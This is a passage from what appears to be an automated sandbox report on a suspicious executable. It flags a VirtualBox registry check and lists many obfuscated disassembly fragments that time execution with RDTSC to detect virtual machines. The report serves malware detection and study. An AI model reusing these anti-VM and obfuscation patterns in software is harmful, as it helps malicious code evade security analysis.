                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F19FAC second address: F19FB1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1A105 second address: F1A139 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9C879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jng 00007FC2C8B9C866h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 js 00007FC2C8B9C878h 0x00000018 jl 00007FC2C8B9C872h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DE81 second address: F1DE87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DE87 second address: F1DF57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9C877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c mov dl, 35h 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D3256h], eax 0x00000016 push D81A347Ch 0x0000001b jmp 00007FC2C8B9C871h 0x00000020 add dword ptr [esp], 27E5CC04h 0x00000027 sbb si, 55EFh 0x0000002c push 00000003h 0x0000002e mov dword ptr [ebp+122D3445h], esi 0x00000034 push 00000000h 0x00000036 mov dh, FEh 0x00000038 push 00000003h 0x0000003a pushad 0x0000003b js 00007FC2C8B9C87Ch 0x00000041 mov si, bx 0x00000044 popad 0x00000045 call 00007FC2C8B9C869h 0x0000004a jnl 00007FC2C8B9C878h 0x00000050 jmp 00007FC2C8B9C872h 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pushad 0x00000059 popad 0x0000005a pop ecx 0x0000005b pop edx 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 jmp 00007FC2C8B9C875h 0x00000065 mov eax, dword ptr [eax] 0x00000067 pushad 0x00000068 push eax 0x00000069 push edx 0x0000006a jmp 00007FC2C8B9C871h 0x0000006f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1DF57 second address: F1DFA0 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2C8C1C416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jc 00007FC2C8C1C416h 0x00000013 popad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jmp 00007FC2C8C1C41Fh 0x0000001e pop eax 0x0000001f mov dword ptr [ebp+122D35EDh], ecx 0x00000025 lea ebx, dword ptr [ebp+12443D4Dh] 0x0000002b xor si, 0DC7h 0x00000030 and ecx, 42E3D52Fh 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push edx 0x0000003b pop edx 0x0000003c pushad 0x0000003d popad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E024 second address: F1E078 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B9C870h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FC2C8B9C868h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D3468h], ebx 0x00000037 push 00000000h 0x00000039 mov dx, 241Ch 0x0000003d push EF1D380Ah 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 push edi 0x00000046 pop edi 0x00000047 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E078 second address: F1E07C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E1FF second address: F1E218 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC2C8B9C868h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC2C8B9C866h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E218 second address: F1E2B8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC2C8C1C416h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007FC2C8C1C425h 0x00000012 popad 0x00000013 popad 0x00000014 mov eax, dword ptr [eax] 0x00000016 jmp 00007FC2C8C1C428h 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 pushad 0x00000027 push edi 0x00000028 pop edi 0x00000029 jmp 00007FC2C8C1C41Eh 0x0000002e popad 0x0000002f popad 0x00000030 pop eax 0x00000031 cld 0x00000032 push 00000003h 0x00000034 add dword ptr [ebp+122D3309h], edi 0x0000003a or edx, 31D78206h 0x00000040 push 00000000h 0x00000042 jnp 00007FC2C8C1C41Ch 0x00000048 mov edx, dword ptr [ebp+122D377Ah] 0x0000004e jng 00007FC2C8C1C41Ch 0x00000054 add ecx, dword ptr [ebp+122D1D8Eh] 0x0000005a push 00000003h 0x0000005c adc si, 4FC7h 0x00000061 push 904A0A4Ah 0x00000066 push eax 0x00000067 push edx 0x00000068 jno 00007FC2C8C1C41Ch 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E2B8 second address: F1E2BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E2BD second address: F1E332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 504A0A4Ah 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FC2C9384958h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+12443D61h] 0x00000030 mov dh, A5h 0x00000032 movsx ecx, di 0x00000035 xchg eax, ebx 0x00000036 push ecx 0x00000037 pushad 0x00000038 jmp 00007FC2C9384964h 0x0000003d push eax 0x0000003e pop eax 0x0000003f popad 0x00000040 pop ecx 0x00000041 push eax 0x00000042 pushad 0x00000043 jmp 00007FC2C9384966h 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F1E332 second address: F1E336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F0E4 second address: F2F0E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F2F0E9 second address: F2F0EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F195 second address: F3F19B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F104F0 second address: F104FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC2C8B95C76h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D12B second address: F3D130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D130 second address: F3D137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D55B second address: F3D55F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D55F second address: F3D565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D565 second address: F3D56A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D86D second address: F3D874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D874 second address: F3D896 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC2C9384961h 0x00000009 jmp 00007FC2C938495Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3D896 second address: F3D8A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3DF55 second address: F3DFA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C938495Ah 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC2C9384962h 0x00000012 jnl 00007FC2C9384956h 0x00000018 push eax 0x00000019 pop eax 0x0000001a popad 0x0000001b push edx 0x0000001c jp 00007FC2C9384956h 0x00000022 jmp 00007FC2C9384966h 0x00000027 pop edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E238 second address: F3E23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E23C second address: F3E249 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2C9384956h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3E249 second address: F3E252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F000 second address: F3F004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F004 second address: F3F015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jno 00007FC2C8B95C76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F015 second address: F3F029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FC2C938495Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F029 second address: F3F048 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC2C8B95C76h 0x00000008 jl 00007FC2C8B95C76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC2C8B95C7Bh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F3F048 second address: F3F04C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F062A7 second address: F062F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C8B95C89h 0x00000007 pushad 0x00000008 jmp 00007FC2C8B95C89h 0x0000000d jmp 00007FC2C8B95C86h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F449FD second address: F44A39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC2C938495Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b jmp 00007FC2C9384966h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC2C938495Bh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44A39 second address: F44A62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FC2C8B95C81h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e jc 00007FC2C8B95C7Ch 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44A62 second address: F44A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F44A68 second address: F44A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC2C8B95C7Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AC3E second address: F4AC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jo 00007FC2C9384956h 0x0000000c pop esi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AC4B second address: F4AC5B instructions: 0x00000000 rdtsc 0x00000002 je 00007FC2C8B95C7Ah 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AC5B second address: F4AC5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A1C4 second address: F4A1EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 je 00007FC2C8B95C76h 0x0000000c pop edi 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jc 00007FC2C8B95C84h 0x00000015 jmp 00007FC2C8B95C7Eh 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A1EC second address: F4A1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A36A second address: F4A39F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC2C8B95C76h 0x00000008 jmp 00007FC2C8B95C7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jbe 00007FC2C8B95C78h 0x00000015 pushad 0x00000016 jmp 00007FC2C8B95C80h 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7E0 second address: F4A7E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7E4 second address: F4A7EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7EA second address: F4A7FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FC2C938495Ah 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A7FA second address: F4A802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A9A0 second address: F4A9A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4A9A4 second address: F4A9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AB04 second address: F4AB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edi 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4AB0F second address: F4AB1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC2C8B95C76h 0x0000000a jbe 00007FC2C8B95C76h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4B3F3 second address: F4B3FD instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC2C938495Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4C3ED second address: F4C3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EECF second address: F4EEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jg 00007FC2C9384956h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EEE4 second address: F4EEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4EEE8 second address: F4EEF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F508AB second address: F508D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC2C8B95C80h 0x0000000b popad 0x0000000c jmp 00007FC2C8B95C84h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4F671 second address: F4F67C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FC2C9384956h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50F05 second address: F50F0A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F50F0A second address: F50F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov esi, dword ptr [ebp+122D36EAh] 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FC2C9384958h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a sub dword ptr [ebp+124471A9h], eax 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FC2C9384958h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 00000016h 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D293Dh] 0x00000052 and esi, 241A9550h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FC2C9384960h 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51A13 second address: F51A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FC2C8B95C8Fh 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 or dword ptr [ebp+122D32D2h], edx 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 jmp 00007FC2C8B95C80h 0x0000001e pop edi 0x0000001f push 00000000h 0x00000021 mov dword ptr [ebp+12441435h], ecx 0x00000027 xchg eax, ebx 0x00000028 push esi 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5182A second address: F5182F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51A63 second address: F51A71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F51A71 second address: F51A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52D74 second address: F52D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F52D78 second address: F52DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a jne 00007FC2C9384956h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop edi 0x00000014 nop 0x00000015 mov edi, eax 0x00000017 push 00000000h 0x00000019 or di, C811h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FC2C9384958h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a xchg eax, ebx 0x0000003b jo 00007FC2C938495Eh 0x00000041 push ebx 0x00000042 jg 00007FC2C9384956h 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FC2C938495Ah 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55E50 second address: F55E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F55E57 second address: F55E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58F37 second address: F58FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C8B95C86h 0x00000009 popad 0x0000000a jmp 00007FC2C8B95C7Fh 0x0000000f popad 0x00000010 push eax 0x00000011 jp 00007FC2C8B95C7Eh 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FC2C8B95C78h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007FC2C8B95C78h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e push 00000000h 0x00000050 jmp 00007FC2C8B95C89h 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC2C8B95C81h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58FE1 second address: F58FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F58FE7 second address: F58FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F5B08B second address: F5B09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC2C938495Bh 0x00000009 popad 0x0000000a rdtsc
